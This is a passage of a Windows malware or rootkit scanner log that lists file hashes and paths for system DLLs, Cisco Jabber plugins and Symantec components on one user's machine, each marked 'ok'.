15:34:01.0251 0x04bc  [ 81466AEED2E69F5711395EAF3256ACD2, E78A3BC0B77BCC1D9FBD503CD177356A268D0891C81B9731E4DC639B2BA73CFB ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
15:34:01.0251 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll - ok
15:34:01.0253 0x04bc  [ 139D3AB6AA920C34C50CBFFB9EB7D222, 5A5D205E16E6AFDCC965E4144FE6E104157DE7541D31727520363F2670513940 ] C:\Windows\SysWOW64\avrt.dll
15:34:01.0253 0x04bc  C:\Windows\SysWOW64\avrt.dll - ok
15:34:01.0254 0x04bc  [ 9C67F6BBDA3881CFD02095160CF91576, 6CE97C6F0AD8BE183DE935A7AAB7D46821E8DE9E55A4BFF54ACB49D056826A94 ] C:\Windows\SysWOW64\ksuser.dll
15:34:01.0255 0x04bc  C:\Windows\SysWOW64\ksuser.dll - ok
15:34:01.0257 0x04bc  [ D0F372A52112F5DBBE589FD7A9737404, FBC39A591FAE942DAC341E3AE3A1FC197DA3D611C180D4FA822897184FBE287A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConversationService\ConversationService.dll
15:34:01.0257 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConversationService\ConversationService.dll - ok
15:34:01.0259 0x04bc  [ 9AED8E824CF5FAAB67957EDBC5512060, 2AEE03C5BFD9151C8F304A4A62F12884761E0F2E1611AE91B9CB0CC390A90212 ] C:\Program Files (x86)\Windows Media Player\wmplayer.exe
15:34:01.0259 0x04bc  C:\Program Files (x86)\Windows Media Player\wmplayer.exe - ok
15:34:01.0261 0x04bc  [ 258BD818F173A121E57B71EF246D1E6E, DE0ACFA5BF70C2EC0507BCAEF1544E48BB784F10BCE86ABDDA85E2C74E25DBBC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ContactService\ContactService.dll
15:34:01.0261 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ContactService\ContactService.dll - ok
15:34:01.0264 0x04bc  [ 51AD41C787CDE09BC6D34DEC554BE860, 0DE496142D5A23F38B6F72FDB9E6515C42A5AAAB35922727EEA7F1369E905570 ] C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Windows.Shell.dll
15:34:01.0264 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\Microsoft.Windows.Shell.dll - ok
15:34:01.0266 0x04bc  [ 96EA13804EE531DFFECD406703704BBE, 453E4671F5DF61BDCD495BF5E062B7B7D015F7D711EF76FE1EFA8A270802CF91 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\outlook-recordsource-sink.dll
15:34:01.0266 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\outlook-recordsource-sink.dll - ok
15:34:01.0268 0x04bc  [ 72A4579540D3157DC4C9FE45A26FD3AF, F7CD39E01B700DAB1434F0CD52125C226F69C10DD47A96FA09EADD5295E2C9CC ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wa8f596b0#\83e6111b6894ac99830694ba1ff1f54c\Microsoft.Windows.Shell.ni.dll
15:34:01.0268 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wa8f596b0#\83e6111b6894ac99830694ba1ff1f54c\Microsoft.Windows.Shell.ni.dll - ok
15:34:01.0270 0x04bc  [ 2452F39FC5AFD330A01C916F0F25B98C, 7A35F2A685C0EDFEED4A35D0E2BFE0DEF8BD2757E032B1E42FE3D7301593C0EF ] C:\Users\boylem1\AppData\Local\NEC\UC700\amsapi.dll
15:34:01.0270 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\amsapi.dll - ok
15:34:01.0272 0x04bc  [ 655522B4E00729AE7E4075CDADF5E5D4, ED3F7295F62A2F7D10E636C54F3DD7EFB2241E3A71E4B49F9669B12FE8671CAC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\icuuc49.dll
15:34:01.0272 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\icuuc49.dll - ok
15:34:01.0274 0x04bc  [ 479A7302E42D40CE5845926F654B32D6, AF0F5E7621394DBCA3C2FF47095816AF65F03FB208735BD45775210EE41C76FC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\icudt49.dll
15:34:01.0274 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\icudt49.dll - ok
15:34:01.0276 0x04bc  [ 5CAB8D9E799CDB8EE8070529F9155DF1, 08F67A80A8F71B58ECC80402E04F4C39DCA9D013D4AD1945A184D175D8D48284 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\63e9d81bd805aea8f8690fee2efc9a9e\PresentationFramework-SystemCore.ni.dll
15:34:01.0276 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\63e9d81bd805aea8f8690fee2efc9a9e\PresentationFramework-SystemCore.ni.dll - ok
15:34:01.0279 0x04bc  [ 1451F13BA7F1786EADCD1A070F3666A8, 37D0D09C515C2C16D97EF9AFBBCAC5E7AB5404DDAE089C0DD90BE2EEE19FE5F8 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\38d6578b4fe29bede85ffff08e3697b6\PresentationFramework-SystemXml.ni.dll
15:34:01.0279 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\38d6578b4fe29bede85ffff08e3697b6\PresentationFramework-SystemXml.ni.dll - ok
15:34:01.0281 0x04bc  [ D01D6C286CFE9EE780F253EBA2C66E2A, 6DFC5561243D0D043A62785E75A46808486F92AA5E05F0EF29769923341CB8BA ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CupSoapC.dll
15:34:01.0281 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CupSoapC.dll - ok
15:34:01.0283 0x04bc  [ 39FEA6FC4C136DD3B03FA83C427454CC, 264290A462AC724E53B4E630FBA1C227C5E5D1C9540B18E0840DFF5BDE1901B3 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msgloop.dll
15:34:01.0283 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\msgloop.dll - ok
15:34:01.0285 0x04bc  [ 285A5823C57E5C44846C217D6DD405CE, A133E17FDA351669F09DDA3B45E80BF3C0152D7F8B50D35FB711E93BB500C05D ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_system-vc90-mt-1_50.dll
15:34:01.0285 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_system-vc90-mt-1_50.dll - ok
15:34:01.0286 0x04bc  [ 08A63BF69048965CADA1604186EEBF88, 818ED1F1E157261FC2DEA6B96B927788FA58F2DB293FB3437853BE2F4B06AEE8 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_thread-vc90-mt-1_50.dll
15:34:01.0286 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_thread-vc90-mt-1_50.dll - ok
15:34:01.0289 0x04bc  [ E4ED1C736202C8E4D7405E2CE7952375, 7DB48302CA1DDDB440FA45B498DA2762A9655657F518B4FD6FEDBE832A5B6ADF ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_chrono-vc90-mt-1_50.dll
15:34:01.0289 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_chrono-vc90-mt-1_50.dll - ok
15:34:01.0291 0x04bc  [ 3202777C68B41B66E8F926CFD298424B, B759ADCF6D86B4CE4BA779B79ED3E6A8172819C1B41A6EA3284BB1FC8F598909 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\threadipc.dll
15:34:01.0291 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\threadipc.dll - ok
15:34:01.0293 0x04bc  [ 07393A09C46083588E751B63B03C8301, 36E2351CF5FA05FEAAEB340B5E04B107B53C8174F8333559D8AEA40BEB94F678 ] C:\Windows\SysWOW64\msacm32.drv
15:34:01.0293 0x04bc  C:\Windows\SysWOW64\msacm32.drv - ok
15:34:01.0295 0x04bc  [ 85683DF1F917E4D7F6BE1A04986BF1C8, D68D9F525D31C1843B6EC8FA950166FA1F34DB71222716E7B22DD33981C152B6 ] C:\Windows\SysWOW64\msacm32.dll
15:34:01.0295 0x04bc  C:\Windows\SysWOW64\msacm32.dll - ok
15:34:01.0297 0x04bc  [ 5A12C364AD1D4FCC0AD0E56DBBC34462, 5FDF434BE4E15311AC83754CF85B5451F5A219D768A5DE3DC4FD9AE0B57B0AD9 ] C:\Windows\SysWOW64\midimap.dll
15:34:01.0297 0x04bc  C:\Windows\SysWOW64\midimap.dll - ok
15:34:01.0299 0x04bc  [ 70E72E508D9F8CEA9D4D11B09204526F, DCCF20A64B4BC1A4F7E9762B577833AF3EC1BA659DDFD6DC2351E02D1AA1517E ] C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
15:34:01.0299 0x04bc  C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe - ok
15:34:01.0301 0x04bc  [ CD4257154C969A461530698E33317908, 8435F10C8BC11A9139E6DC5D364FD5FC9F6BCF3D552BEC1E09C4F80626322E22 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\HubWindowPlugin\HubWindowPlugin.dll
15:34:01.0301 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\HubWindowPlugin\HubWindowPlugin.dll - ok
15:34:01.0303 0x04bc  [ 81C4D657D37C3A5418B54BFECE821B84, C7D03F79EE241037F14007EAECA56AA11A600AC61F6F35439A71FE8618CBDFFA ] C:\Windows\SysWOW64\pngfilt.dll
15:34:01.0303 0x04bc  C:\Windows\SysWOW64\pngfilt.dll - ok
15:34:01.0305 0x04bc  [ 965C092F57BB1A999D42CDACFD6ABB56, C13896F906D2B9EACC5F0E06271C50A38B760D92A28B27B6791A6564B761C510 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberUpgradePlugin\JabberUpgradePlugin.dll
15:34:01.0305 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberUpgradePlugin\JabberUpgradePlugin.dll - ok
15:34:01.0307 0x04bc  [ 885AA11A3170B87CC3169666195F4407, 48E557CD37C23FCFD908AA0491A7732D01E1402A31AF41DCF87F705B74113383 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\ContactsSearchPlugin\ContactsSearchPlugin.dll
15:34:01.0307 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\ContactsSearchPlugin\ContactsSearchPlugin.dll - ok
15:34:01.0309 0x04bc  [ 58A14C45A5CD2528F10A889E7B0C3FC2, 81521B27F6DE4F2451C5441DFA93781B6687EE8F9AE62A8FE76D61DE7965E6EF ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\atl90.dll
15:34:01.0309 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\atl90.dll - ok
15:34:01.0312 0x04bc  [ 77C966D0AB83751504940C788DCB678F, C6D0DAD2093B00E0954E14D8A7C841DBC0026C46BA0C5C052FB7DD13B7781767 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\316b149dbb031d0e35c9d57bb2fc4b6e\System.ServiceModel.ni.dll
15:34:01.0312 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\316b149dbb031d0e35c9d57bb2fc4b6e\System.ServiceModel.ni.dll - ok
15:34:01.0314 0x04bc  [ 0207ED32F31735B0ACFECE068D7DB742, 4DA10A4F2444FF54B1E5ACA39590EFC39A11D6C2C3901C31C4537299833E7EBC ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceAreaPlugin\PresenceAreaPlugin.dll
15:34:01.0314 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceAreaPlugin\PresenceAreaPlugin.dll - ok
15:34:01.0316 0x04bc  [ 989F67708317846DC2FF438247D5A1AF, 7819FED76FABF028BC633E994D964DD1417C1D4151EB0D4CC2DCA45D9379858C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\DiagnosticsPlugin\DiagnosticsPlugin.dll
15:34:01.0316 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\DiagnosticsPlugin\DiagnosticsPlugin.dll - ok
15:34:01.0318 0x04bc  [ 6D5BF25D6D73C86522EA411C91326BF4, D370A63A0657B79A22AAC012E98522AC904E204598A7A9CBB2AF598B2DB793C1 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\ConversationWindowPlugin\ConversationWindowPlugin.dll
15:34:01.0318 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\ConversationWindowPlugin\ConversationWindowPlugin.dll - ok
15:34:01.0320 0x04bc  [ 876DF26AC4CE5324ECBDDC7EC69BA11C, 801DFAB204FCC7A6FA27197D19C4E22EA6077F34D6826485A5DBE8189D97EECD ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\BrowserPlugin\BrowserPlugin.dll
15:34:01.0320 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\BrowserPlugin\BrowserPlugin.dll - ok
15:34:01.0323 0x04bc  [ EFFCA981C974DB5EABC21F0BE31072D4, C59F175CE3D64D2EB5B22CB03ACAAEBB40E1BD0058AE85982C9DF0D6947E9E33 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceConnectorPlugin\PresenceConnectorPlugin.dll
15:34:01.0323 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceConnectorPlugin\PresenceConnectorPlugin.dll - ok
15:34:01.0325 0x04bc  [ FAED00A59D719EE70B81FAB96ED7028E, 7B38A45587A5F9D9ACD2B954752AA00436895879313AE9A7062EDDBF04A4F503 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\OptionsWindow\OptionsWindow.dll
15:34:01.0325 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\OptionsWindow\OptionsWindow.dll - ok
15:34:01.0327 0x04bc  [ 45C021E4BC7BA5532A7879EB3C83B03D, 15A9F9A4CC1154DB61443139DA7A546ECFDE78D4AC5D64C82F2A26E7F449DFA0 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\GeneralTab\GeneralTab.dll
15:34:01.0327 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\GeneralTab\GeneralTab.dll - ok
15:34:01.0329 0x04bc  [ 96880BB297AD42F7A42E97C074B7DAE1, 48706D2593E58EA022182D377F500654CAF9E6808D621B0F0EFBCB9FB5C59AA1 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\OptionsTab.dll
15:34:01.0329 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\OptionsTab.dll - ok
15:34:01.0332 0x04bc  [ 6FA93339F5B4A7122454820F011C85C4, DF8D8E15DC87B2F00E147C162404D1264C8835089C91EA03B1A41B202E820A9C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\instant-message\instant-message.dll
15:34:01.0332 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\instant-message\instant-message.dll - ok
15:34:01.0334 0x04bc  [ D8D5F6C257B06FA709C2764C9A7FE48C, 4AB6DE72954A88DF27F3256896AE584C57EB009C80673F714308DB58C82A8180 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymNeti.dll
15:34:01.0334 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SymNeti.dll - ok
15:34:01.0336 0x04bc  [ BC0D4AFBE94D8E1F81C8926D805C3366, 05734F888CEC5CCA81B81C959EF11C6D32740A512C785D42A497CC09C23796C9 ] C:\Windows\System32\webcheck.dll
15:34:01.0336 0x04bc  C:\Windows\System32\webcheck.dll - ok
15:34:01.0338 0x04bc  [ 40B82688907A7DBA4DB3B5ADDE3EAB3B, 7A8A051F414A0A11252A361461A086890BCE9F49CE1AF794061184AE16517EF1 ] C:\Windows\SysWOW64\mfplat.dll
15:34:01.0338 0x04bc  C:\Windows\SysWOW64\mfplat.dll - ok
15:34:01.0340 0x04bc  [ 21310AC456E9275E6D0AC5CACEE4A30B, 755637E96A8FB1C32040043FA83FC0461CF0C9331A7F3CEAA133F51CA3272747 ] C:\Windows\System32\ieframe.dll
15:34:01.0340 0x04bc  C:\Windows\System32\ieframe.dll - ok
15:34:01.0342 0x04bc  [ BD17215A1C8247B37B9FAAF18E93E81A, 8756652406E04ECF028221B19095EB4BE74E2773D1F2A039D2151282C9B90A44 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSEBind.dll
15:34:01.0342 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSEBind.dll - ok
15:34:01.0344 0x04bc  [ BFEBB6F76A0988A38260870C61A6D1B7, 1AC79646C61B147CBAF69D439F114F4DD029E5D1C37DF7FFE1121902474E83EC ] C:\Windows\SysWOW64\mfreadwrite.dll
15:34:01.0344 0x04bc  C:\Windows\SysWOW64\mfreadwrite.dll - ok
15:34:01.0346 0x04bc  [ FDBA1DEC4F9BE4274A00B9B850C63484, 045846267BCB1D9C4931A4871C887D8496E92DF655936DD5D40375E09C950510 ] C:\Windows\SysWOW64\mf.dll
15:34:01.0346 0x04bc  C:\Windows\SysWOW64\mf.dll - ok
15:34:01.0348 0x04bc  [ CF932C8A0B6953EF4002338C44B63199, EC306D3DF320CD37DE49301F2102A4FFCF38CEA5A309DB86CB477D4986EFA387 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LUSub.dll
15:34:01.0348 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LUSub.dll - ok
15:34:01.0350 0x04bc  [ 1F27643C4C626457FCE8F047AE1CD7E1, 68E2367B9AA21C1BDE7FEA566D5F0DBDF1E246CB53E949622F8EDC810AA95956 ] C:\Windows\SysWOW64\dxva2.dll
15:34:01.0350 0x04bc  C:\Windows\SysWOW64\dxva2.dll - ok
15:34:01.0352 0x04bc  [ 44205D8AF346147ECB0080014128033E, 5C01704CC79202C703ABBA6BE5E9B43DA2799809100719FFD89CE46E23FAE003 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ReportSubmission.dll
15:34:01.0352 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ReportSubmission.dll - ok
15:34:01.0355 0x04bc  [ F52B5E360C859ABF448D45AF6D8A5747, 0ED88F51FC1F4147314CBC37C259A189E019606EA4BEE13897FF49EBD487A5AE ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ScreenCapture.dll
15:34:01.0355 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ScreenCapture.dll - ok
15:34:01.0357 0x04bc  [ 5B6EB0AB44497D636DCE98B715AB5415, 12713EA7BCDBB1599E9DB3032872480091F77AA65A9D21D47D2E044DD6F78C28 ] C:\Users\boylem1\AppData\Local\NEC\UC700\UC700GlobalHook.dll
15:34:01.0357 0x04bc  C:\Users\boylem1\AppData\Local\NEC\UC700\UC700GlobalHook.dll - ok
15:34:01.0359 0x04bc  [ E1AC89F6C5252057E6062843E36A6701, 32BE52836F2A011D46957AD60ABA48986B87026FD50ED09D8495460C7F1AB23E ] C:\Windows\SysWOW64\SearchProtocolHost.exe
15:34:01.0359 0x04bc  C:\Windows\SysWOW64\SearchProtocolHost.exe - ok
15:34:01.0361 0x04bc  [ 7D40FA95F1C7910D68EE829EFBBE6B42, E8A3BC6D1CE86D80FF7B21C8193D6C84750D80AF73D48F45B0E23207B6A57C99 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\9370714a38ae2805434296b26a9f5b14\PresentationFramework-SystemXmlLinq.ni.dll
15:34:01.0361 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\9370714a38ae2805434296b26a9f5b14\PresentationFramework-SystemXmlLinq.ni.dll - ok
15:34:01.0364 0x04bc  [ 465DBF63A5049E4DB4BC5C12FFE781CB, D12F6A9FB92144B2CFFD28BD72C234BA42F882EF22122DB83CE5EB1B8EBE9017 ] C:\Windows\SysWOW64\tquery.dll
15:34:01.0364 0x04bc  C:\Windows\SysWOW64\tquery.dll - ok
15:34:01.0366 0x04bc  [ 1309460A95AA8A4D85BCDE616D95F7C0, CC206B8685C3D137294C45147AF1EA49D6CB914D7FC4880967E9A49645AD734E ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyDesktopSharePlugin\TelephonyDesktopSharePlugin.dll
15:34:01.0366 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyDesktopSharePlugin\TelephonyDesktopSharePlugin.dll - ok
15:34:01.0368 0x04bc  [ 45FB05F743E626D9E239E52602CEA041, 947F9DD7B6AD7A5386868E084EF0FDF48B94F445DC7852D1A82EF9B3A237624C ] C:\Windows\SysWOW64\msctfui.dll
15:34:01.0368 0x04bc  C:\Windows\SysWOW64\msctfui.dll - ok
15:34:01.0370 0x04bc  [ A5D237B8673025B052C0E6FDB6A883E8, 0DAE34965C08F7450938A5145D2B53C68AA917744B8C6FCB130A35C03C5CEF6F ] C:\Windows\SysWOW64\msshooks.dll
15:34:01.0370 0x04bc  C:\Windows\SysWOW64\msshooks.dll - ok
15:34:01.0372 0x04bc  [ 4C298C9DDEFC27A187F8B4F56D60D971, 06D399D25A4E64AAAF4B38AD2E69FB1602BE48A8F0FFDBA38DF77B67BA218779 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyPlugin\TelephonyPlugin.dll
15:34:01.0372 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyPlugin\TelephonyPlugin.dll - ok
15:34:01.0374 0x04bc  [ 0A2D3994E4633A3E448C465D51388F66, 0DA8A45FAE8BC3E1F9751D84BE0277B284942F7FAB8C5C716B068F591EA0CB8F ] C:\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\75b6a68103e1b76063d9f69b8275ae61\UIAutomationTypes.ni.dll
15:34:01.0374 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\75b6a68103e1b76063d9f69b8275ae61\UIAutomationTypes.ni.dll - ok
15:34:01.0376 0x04bc  [ FD049C25A168D3DE310D9207B7B6367B, 48966605E7CF87996068AC1A2E563F90F6F152E710323792C633E10BCBA480E4 ] C:\Windows\SysWOW64\UIAutomationCore.dll
15:34:01.0376 0x04bc  C:\Windows\SysWOW64\UIAutomationCore.dll - ok
15:34:01.0378 0x04bc  [ C335EC1182AC10B188705554E0BC1186, 963CD11CEF7A79559361134FDF9C07B8EA829A40D3996D77E95C291DD17AAD2B ] C:\Windows\SysWOW64\msvfw32.dll
15:34:01.0378 0x04bc  C:\Windows\SysWOW64\msvfw32.dll - ok
15:34:01.0380 0x04bc  [ 81600E2E27ED61427AAD865B9BCDDB9D, 0D7D39C0A5A2C24FAADCA41658A1C62D13180B462C78103BDF6DBD76B64DD79A ] C:\Windows\SysWOW64\msidle.dll
15:34:01.0380 0x04bc  C:\Windows\SysWOW64\msidle.dll - ok
15:34:01.0382 0x04bc  [ 49A3AD5CE578CD77F445F3D244AEAB2D, 1D200547C6277C4A878A9ADD94045F7ACCC583609985C592AAE9B9B9CA7B812A ] C:\Windows\System32\SearchFilterHost.exe
15:34:01.0382 0x04bc  C:\Windows\System32\SearchFilterHost.exe - ok
15:34:01.0384 0x04bc  [ 26668D41E111247712CDC128154BA9C3, 137B753245F93F6F536871EFFFF03FC9223DC25C223631A5F91047E901B43A08 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyRuntime\TelephonyRuntime.dll
15:34:01.0384 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyRuntime\TelephonyRuntime.dll - ok
15:34:01.0386 0x04bc  [ FA4D9E6F40D651D7581226F36471AE90, 30805B299E8FDAB66E7B6CFE0B5646BB828124EEE097E3E9E10E7454A16D200A ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyDeviceSelectionPlugin\TelephonyDeviceSelectionPlugin.dll
15:34:01.0386 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyDeviceSelectionPlugin\TelephonyDeviceSelectionPlugin.dll - ok
15:34:01.0388 0x04bc  [ D2A5B2B09F2AF5ED13BF494508B09788, 3FA04E84EC5A575E7804E44BA3BF1C4143E53C4ACF6C823CD029711529B0BE2C ] C:\Windows\System32\msshooks.dll
15:34:01.0388 0x04bc  C:\Windows\System32\msshooks.dll - ok
15:34:01.0390 0x04bc  [ E2C9D3E5AC94B38050BD3ADEB2FC7B0F, EDA4DFE2FCE155F0399902CCC9E4531956BCF70C8BBAD4251800840E068B3B84 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\VXIPlugin\VXIPlugin.dll
15:34:01.0390 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\VXIPlugin\VXIPlugin.dll - ok
15:34:01.0392 0x04bc  [ A08C010D859F8EB42BDD7E1D55B8CA27, F86EAFBF7AA41D8425156C07398EDC3BD42F1690BD3E15D27AEF2EDA86549F15 ] C:\Windows\System32\mscoree.dll
15:34:01.0392 0x04bc  C:\Windows\System32\mscoree.dll - ok
15:34:01.0394 0x04bc  [ D44067027714CC58B8AB0AC38FDA1A0B, 56E96A58B5A53A68485F8D2F7BA286F2B174AB910BD45145258D48251F489F02 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
15:34:01.0394 0x04bc  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll - ok
15:34:01.0397 0x04bc  [ 7DF566CDC2925365FBDD18A1FD7B1AD9, 7D515169DD7D2B15D43A30DC5619CAC91FECD57C29A4C0948433FED2D540463C ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\AudioVideoTabPlugin\AudioVideoTabPlugin.dll
15:34:01.0397 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\AudioVideoTabPlugin\AudioVideoTabPlugin.dll - ok
15:34:01.0399 0x04bc  [ FB4045578F5180BDB1963AB352B78548, 8E645A63436EE6CDDB78E6064AEB04ECE39208F760A3EF13A3F49FDF41505E21 ] C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
15:34:01.0399 0x04bc  C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll - ok
15:34:01.0401 0x04bc  [ 9108540E866F75C7AF2B91DD921A8091, 7208C8E05E818781D7F2703B86848FC90651E0D8BE10362863250F2283CEC511 ] C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll
15:34:01.0401 0x04bc  C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll - ok
15:34:01.0403 0x04bc  [ 8494E126F0B10180F3293AF861CE1F7A, 538B1F30423DB2398E611BC46C80150C090698E633BABF7362F7060DBF0C3064 ] C:\Windows\System32\mlang.dll
15:34:01.0403 0x04bc  C:\Windows\System32\mlang.dll - ok
15:34:01.0405 0x04bc  [ 4B36C3BFAA5AD2B4D6698AAB28837A73, 20021D1C674C08F9F641FD3AA6C5C5A9A504E7D1DC7779EE6070E03D6DE8B174 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\VoicemailPlugin\VoicemailPlugin.dll
15:34:01.0405 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\VoicemailPlugin\VoicemailPlugin.dll - ok
15:34:01.0407 0x04bc  [ 712CE132B3FDEBA5A57318A39B42F5EB, 69E80865DDF779F029CECBF42D045DD0555DDB07F520FCE61728D809F8260DC8 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\VoiceMailPlayback.dll
15:34:01.0407 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\VoiceMailPlayback.dll - ok
15:34:01.0409 0x04bc  [ 101797BA603D227946B4B5109867EB19, EBF2B48D1A4FE148F455EA32023ABC0D479215D48C7CE76E765F199CD3C80AF8 ] C:\Windows\System32\SyncCenter.dll
15:34:01.0409 0x04bc  C:\Windows\System32\SyncCenter.dll - ok
15:34:01.0411 0x04bc  [ F325AA4B515A51EE4835C1ABAF55F43E, 456F236644A47E462A81E23935BD3B42D697EC728EF84805915072225BE4B54F ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\VoicemailService\VoicemailService.dll
15:34:01.0411 0x04bc  C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\VoicemailService\VoicemailService.dll - ok
15:34:01.0414 0x04bc  [ BC46E30E37EDCDD7E45493B80E131EA7, FB412B75922DE52987BC0B6BFE1EB78CED5BAD0BD6C8A3264F2D4BEB0AEB8A81 ] C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\046058f81b039ab6fd839e03e67595f8\SMDiagnostics.ni.dll
15:34:01.0414 0x04bc  C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\046058f81b039ab6fd839e03e67595f8\SMDiagnostics.ni.dll - ok
